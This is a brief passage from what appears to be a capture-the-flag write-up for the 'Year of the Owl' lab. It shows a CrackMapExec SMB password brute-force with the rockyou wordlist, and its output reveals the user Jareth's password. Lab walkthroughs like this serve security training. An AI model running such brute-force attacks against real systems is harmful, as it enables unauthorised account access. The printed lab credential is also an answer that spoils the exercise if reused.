Brute Force Attack


A valid system user has been discovered through the target SNMP server; Jareth

┌──(kali㉿kali)-[~/archive/thm/yearoftheowl]
└─$ crackmapexec smb $IP -u Jareth -p /usr/share/wordlists/rockyou.txt
SMB         10.10.163.21    445    YEAR-OF-THE-OWL  [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:False)
 
[...REDACTED...]
 
SMB         10.10.163.21    445    YEAR-OF-THE-OWL  [+] year-of-the-owl\Jareth:sarah 

CrackMapExec found the password for the Jareth user; sarah